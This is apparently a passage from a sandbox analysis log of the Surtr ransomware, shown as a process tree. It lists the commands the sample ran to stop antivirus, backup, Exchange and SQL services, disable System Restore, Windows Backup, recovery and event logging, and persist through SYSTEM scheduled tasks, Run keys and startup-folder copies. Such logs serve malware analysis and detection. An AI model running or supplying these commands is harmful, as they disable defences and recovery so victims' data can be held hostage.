    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:4040
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
      4⤵
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
    3⤵
    PID:4056
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Filter Service"
      4⤵
      PID:4064
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Filter Service"
        5⤵
        
        PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:4072
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
    3⤵
    PID:3060
  - - C:\Windows\system32\net.exe
      net stop "Symantec System Recovery"
      4⤵
      PID:884
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Symantec System Recovery"
        5⤵
        
        PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:2520
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
      4⤵
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:3128
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
      4⤵
      PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:3184
  - - C:\Windows\system32\net.exe
      net stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:3160
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
        5⤵
        
        PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:2920
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
      4⤵
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
    3⤵
    PID:2652
  - - C:\Windows\system32\net.exe
      net stop "AcronisAgent"
      4⤵
      PID:1144
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcronisAgent"
        5⤵
        
        PID:3260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:2324
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
      4⤵
      PID:3276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:3216
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
      4⤵
      PID:3320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
    3⤵
    PID:3028
  - - C:\Windows\system32\net.exe
      net stop "AcrSch2Svc"
      4⤵
      PID:1924
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcrSch2Svc"
        5⤵
        
        PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:2472
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
      4⤵
      PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Antivirus"
    3⤵
    PID:1632
  - - C:\Windows\system32\net.exe
      net stop "Antivirus"
      4⤵
      PID:2320
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Antivirus"
        5⤵
        
        PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:2368
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
      4⤵
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:3356
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:3360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
    3⤵
    PID:1656
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentAccelerator"
      4⤵
      PID:1588
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
        5⤵
        
        PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:2400
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:1732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
    3⤵
    PID:1688
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentBrowser"
      4⤵
      PID:2128
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
        5⤵
        
        PID:1740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:2392
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:1808
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
      4⤵
      PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
    3⤵
    PID:768
  - - C:\Windows\system32\net.exe
      net stop "BackupExecDeviceMediaService"
      4⤵
      PID:3016
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
        5⤵
        
        PID:352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1148
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
      4⤵
      PID:200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
    3⤵
    PID:2948
  - - C:\Windows\system32\net.exe
      net stop "BackupExecJobEngine"
      4⤵
      PID:2380
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecJobEngine"
        5⤵
        
        PID:1304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1920
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1112
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
    3⤵
    PID:1756
  - - C:\Windows\system32\net.exe
      net stop "BackupExecManagementService"
      4⤵
      PID:1764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecManagementService"
        5⤵
        
        PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:2460
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
    3⤵
    PID:2992
  - - C:\Windows\system32\net.exe
      net stop "BackupExecRPCService"
      4⤵
      PID:764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecRPCService"
        5⤵
        
        PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1288
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:216
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
    3⤵
    PID:1628
  - - C:\Windows\system32\net.exe
      net stop "BackupExecVSSProvider"
      4⤵
      PID:1560
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecVSSProvider"
        5⤵
        
        PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:2088
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
    3⤵
    PID:596
  - - C:\Windows\system32\net.exe
      net stop "EPSecurityService"
      4⤵
      PID:1780
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EPSecurityService"
        5⤵
        
        PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1692
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:2964
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
    3⤵
    PID:2052
  - - C:\Windows\system32\net.exe
      net stop "IISAdmin"
      4⤵
      PID:704
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IISAdmin"
        5⤵
        
        PID:1344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
    3⤵
    PID:1796
  - - C:\Windows\system32\net.exe
      net stop "IMAP4Svc"
      4⤵
      PID:2040
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IMAP4Svc"
        5⤵
        
        PID:976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
    3⤵
    PID:2412
  - - C:\Windows\system32\net.exe
      net stop "macmnsvc"
      4⤵
      PID:484
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "macmnsvc"
        5⤵
        
        PID:776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "masvc"
    3⤵
    PID:2748
  - - C:\Windows\system32\net.exe
      net stop "masvc"
      4⤵
      PID:2880
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "masvc"
        5⤵
        
        PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBAMService"
    3⤵
    PID:3008
  - - C:\Windows\system32\net.exe
      net stop "MBAMService"
      4⤵
      PID:2784
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBAMService"
        5⤵
        
        PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
    3⤵
    PID:1816
  - - C:\Windows\system32\net.exe
      net stop "MBEndpointAgent"
      4⤵
      PID:2632
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBEndpointAgent"
        5⤵
        
        PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
    3⤵
    PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
    3⤵
    - Drops startup file
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
    3⤵
    - Drops startup file
    PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
    3⤵
    PID:3424
  - - C:\Windows\system32\net.exe
      net stop "McAfeeEngineService"
      4⤵
      PID:3024
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeEngineService"
        5⤵
        
        PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
    3⤵
    PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
    3⤵
    PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
    3⤵
    PID:568
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFramework"
      4⤵
      PID:2248
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFramework"
        5⤵
        
        PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
    3⤵
    PID:2956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
    3⤵
    PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
    3⤵
    PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:3300
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:3472
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
        5⤵
        
        PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
    3⤵
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
    3⤵
    PID:3552
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\ProgramData\Service"
      4⤵
      Views/modifies file attributes
      PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McShield"
    3⤵
    PID:2884
  - - C:\Windows\system32\net.exe
      net stop "McShield"
      4⤵
      PID:3616
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McShield"
        5⤵
        
        PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfemms"
    3⤵
    PID:3520
  - - C:\Windows\system32\net.exe
      net stop "mfemms"
      4⤵
      PID:2296
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfemms"
        5⤵
        
        PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
    3⤵
    PID:2436
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
      4⤵
      Views/modifies file attributes
      PID:580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfevtp"
    3⤵
    PID:3632
  - - C:\Windows\system32\net.exe
      net stop "mfevtp"
      4⤵
      PID:896
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfevtp"
        5⤵
        
        PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    PID:2224
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MMS"
    3⤵
    PID:3644
  - - C:\Windows\system32\net.exe
      net stop "MMS"
      4⤵
      PID:848
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MMS"
        5⤵
        
        PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
    3⤵
    PID:1532
  - - C:\Windows\system32\net.exe
      net stop "mozyprobackup"
      4⤵
      PID:3652
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mozyprobackup"
        5⤵
        
        PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
    3⤵
    PID:1080
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer"
      4⤵
      PID:3660
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer"
        5⤵
        
        PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
    3⤵
    PID:2348
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer100"
      4⤵
      PID:1520
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer100"
        5⤵
        
        PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    PID:2292
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
    3⤵
    PID:2124
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer110"
      4⤵
      PID:1744
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer110"
        5⤵
        
        PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
    3⤵
    - Drops startup file
    PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1868
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
    3⤵
    PID:2132
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeES"
      4⤵
      PID:1340
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeES"
        5⤵
        
        PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:576
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:2424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
    3⤵
    PID:2304
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeIS"
      4⤵
      PID:1856
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeIS"
        5⤵
        
        PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1636
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1084
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
    3⤵
    PID:2036
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMGMT"
      4⤵
      PID:2620
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMGMT"
        5⤵
        
        PID:1480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
    3⤵
    PID:2232
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMTA"
      4⤵
      PID:3716
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMTA"
        5⤵
        
        PID:3700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
    3⤵
    PID:3692
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSA"
      4⤵
      PID:2704
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSA"
        5⤵
        
        PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
    3⤵
    PID:3764
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSRS"
      4⤵
      PID:3728
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSRS"
        5⤵
        
        PID:3796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
    3⤵
    PID:1148
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SQL_2008"
      4⤵
      PID:2380
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
        5⤵
        
        PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
    3⤵
    PID:2960
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SYSTEM_BGC"
      4⤵
      PID:1112
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
        5⤵
        
        PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
    3⤵
    PID:1756
  - - C:\Windows\system32\net.exe
